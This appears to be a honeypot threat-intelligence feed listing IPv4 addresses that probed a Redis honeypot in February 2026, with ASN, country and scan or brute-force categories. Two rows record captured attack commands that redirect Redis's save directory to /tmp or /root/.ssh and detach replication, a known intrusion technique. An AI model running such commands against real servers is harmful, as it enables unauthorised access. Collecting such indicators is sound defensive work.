| IPv4 | 47.121.142.102 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-22 | |
| IPv4 | 47.236.160.173 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 47.84.198.211 | Attacker IP • Redis / seen in Redishoneypot; events=66; ports=6379; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 167.248.133.117 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 198.235.24.252 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 20.169.104.211 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 104.131.9.50 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 103.174.102.198 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=133719; asn_org=IDIGITALCAMP WEB SERVICES; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 142.93.0.16 | Attacker IP • Redis / seen in Redishoneypot; events=22; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 198.199.65.137 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 142.93.13.246 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 184.105.139.99 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 216.180.246.10 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 101.200.243.197 | Attacker IP • Redis / seen in Redishoneypot; events=24; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 23.92.27.206 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 98.142.251.104 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=202015; asn_org=HZ Hosting Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 123.56.142.238 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 135.237.125.196 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 147.182.141.71 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 195.184.76.157 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 91.230.168.107 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 91.230.168.206 | Attacker IP • Redis / seen in Redishoneypot; events=13; ports=6379; cc=US; asn=213412; asn_org=ONYPHE SAS; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 167.94.138.186 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 178.154.236.115 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=RU; asn=200350; asn_org=Yandex.Cloud LLC; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 185.242.226.22 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | scanning_host | 2026-02-23 | |
| IPv4 | 205.210.31.176 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-23 | |
| IPv4 | 159.65.218.253 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-24 | |
| IPv4 | 193.163.125.104 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-24 | |
| IPv4 | 159.89.52.214 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-24 | |
| IPv4 | 216.180.246.143 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-24 | |
| IPv4 | 216.180.246.32 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-02-24 | |
| IPv4 | 157.245.141.122 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-24 | |
| IPv4 | 198.199.73.13 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-24 | |
| IPv4 | 39.105.210.120 | Attacker IP • Redis / seen in Redishoneypot; events=38; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmds=CONFIG SET dir /tmp/,SLAVEOF NO ONE,config set dbfilename dump.rdb,config set dir .,config set dbfilename root; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-02-24 | |
| IPv4 | 47.101.36.96 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-24 | |
| IPv4 | 20.103.47.2 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=NL; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-24 | |
| IPv4 | 171.22.30.234 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=NL; asn=41745; asn_org=Baykov Ilya Sergeevich; redis_cmd_hits=0 | scanning_host | 2026-02-24 | |
| IPv4 | 172.234.221.84 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-24 | |
| IPv4 | 64.62.197.238 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-24 | |
| IPv4 | 162.142.125.212 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-24 | |
| IPv4 | 91.196.152.157 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=FR; asn=213412; asn_org=ONYPHE SAS; redis_cmd_hits=0 | scanning_host | 2026-02-24 | |
| IPv4 | 205.210.31.111 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-24 | |
| IPv4 | 64.62.197.107 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-25 | |
| IPv4 | 64.62.197.115 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-25 | |
| IPv4 | 47.117.87.239 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-25 | |
| IPv4 | 162.142.125.246 | Attacker IP • Redis / seen in Redishoneypot; events=1; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-25 | |
| IPv4 | 138.197.101.95 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-25 | |
| IPv4 | 66.240.236.116 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-25 | |
| IPv4 | 173.255.223.103 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-25 | |
| IPv4 | 207.231.108.199 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=40676; asn_org=Psychz Networks; redis_cmd_hits=0 | bruteforce | 2026-02-25 | |
| IPv4 | 91.228.110.58 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=MD; asn=43588; asn_org=IM Level 7 SRL; redis_cmd_hits=0 | bruteforce | 2026-02-25 | |
| IPv4 | 45.7.144.44 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=BR; asn=266605; asn_org=2B Tecnologias em Informatica LTDA; redis_cmd_hits=0 | scanning_host | 2026-02-25 | |
| IPv4 | 71.6.232.23 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-25 | |
| IPv4 | 216.180.246.200 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-02-25 | |
| IPv4 | 206.168.34.63 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-25 | |
| IPv4 | 46.224.126.208 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=DE; asn=24940; asn_org=Hetzner Online GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-25 | |
| IPv4 | 89.58.13.149 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=DE; asn=197540; asn_org=netcup GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-25 | |
| IPv4 | 198.235.24.162 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-25 | |
| IPv4 | 223.76.108.98 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-26 | |
| IPv4 | 4.174.176.158 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-26 | |
| IPv4 | 20.76.215.81 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=NL; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-26 | |
| IPv4 | 222.223.160.18 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-26 | |
| IPv4 | 207.148.126.19 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=SG; asn=20473; asn_org=The Constant Company, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-26 | |
| IPv4 | 27.37.68.89 | Attacker IP • Redis / seen in Redishoneypot; events=41; ports=6379; cc=CN; asn=17816; asn_org=China Unicom IP network China169 Guangdong province; cats=Misc activity; redis_cmds=config set rdbcompression no,config set dir /root/.ssh/,save,SLAVEOF NO ONE,config set rdbcompression yes; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-02-26 | |
| IPv4 | 75.119.153.54 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-26 | |
| IPv4 | 18.221.132.46 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-26 | |
| IPv4 | 167.248.133.120 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-26 | |
| IPv4 | 18.119.13.69 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Misc activity; redis_cmd_hits=0 | bruteforce | 2026-02-26 | |
| IPv4 | 176.65.148.150 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=NL; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); redis_cmd_hits=0 | scanning_host | 2026-02-26 | |
| IPv4 | 206.168.34.53 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-26 | |
| IPv4 | 137.184.199.156 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-26 | |
| IPv4 | 47.106.66.34 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-26 | |
| IPv4 | 172.237.136.85 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-26 | |
| IPv4 | 64.62.197.232 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-26 | |
| IPv4 | 138.91.109.125 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-26 | |
| IPv4 | 157.245.229.234 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-26 | |
| IPv4 | 64.89.163.109 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=401626; asn_org=Netiface America, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-26 | |
| IPv4 | 118.31.115.76 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-26 | |
| IPv4 | 138.197.207.198 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-26 | |
| IPv4 | 147.185.132.88 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-26 | |
| IPv4 | 193.163.125.98 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 20.169.107.54 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 84.46.250.37 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 159.89.119.50 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 159.223.119.179 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 159.65.179.156 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 162.133.143.106 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=36351; asn_org=IBM Cloud; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 167.99.2.238 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 1.15.94.7 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 159.65.155.36 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 35.169.206.177 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 196.70.254.249 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=MA; asn=6713; asn_org=Itissalat Al-MAGHRIB; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 52.165.223.181 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 1.83.125.219 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 148.135.109.187 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=35916; asn_org=MULTACOM CORPORATION; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 66.132.153.122 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 89.252.152.193 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=TR; asn=42846; asn_org=GNET Internet Telekomunikasyon A.S.; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 74.82.47.18 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 74.82.47.2 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 94.72.101.121 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 172.234.218.22 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 217.216.73.160 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=SG; asn=141995; asn_org=Contabo Asia Private Limited; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 221.207.35.160 | Attacker IP • Redis / seen in Redishoneypot; events=11; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 45.136.236.212 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=TH; asn=56309; asn_org=Siamdata Communication Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 159.65.76.40 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 20.175.205.56 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 51.8.231.189 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 113.44.57.124 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=55990; asn_org=Huawei Cloud Service data center; redis_cmd_hits=0 | scanning_host | 2026-02-27 | |
| IPv4 | 138.68.25.73 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 159.223.149.250 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 45.154.25.117 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=TH; asn=56309; asn_org=Siamdata Communication Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 159.54.171.233 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=31898; asn_org=Oracle Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-27 | |
| IPv4 | 106.75.152.199 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 106.75.9.195 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=4808; asn_org=China Unicom Beijing Province Network; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 147.185.132.49 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 77.238.226.238 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=NL; asn=216071; asn_org=Servers Tech Fzco; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 139.59.212.230 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 193.227.109.72 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=HK; asn=6134; asn_org=XNNET LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 20.75.44.66 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 98.80.4.98 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 128.140.124.155 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=DE; asn=24940; asn_org=Hetzner Online GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 36.135.17.52 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=134810; asn_org=China Mobile Group JiLin communications corporation; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 45.252.76.229 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=IN; asn=135212; asn_org=Digiway Net Pvt Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 185.215.180.188 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 52.226.149.227 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 20.169.105.52 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 20.235.199.122 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 206.168.34.221 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 71.6.134.233 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 45.79.82.114 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 64.227.10.26 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 65.49.1.182 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
| IPv4 | 65.49.1.189 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-28 | |
| IPv4 | 20.168.6.41 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-28 | |
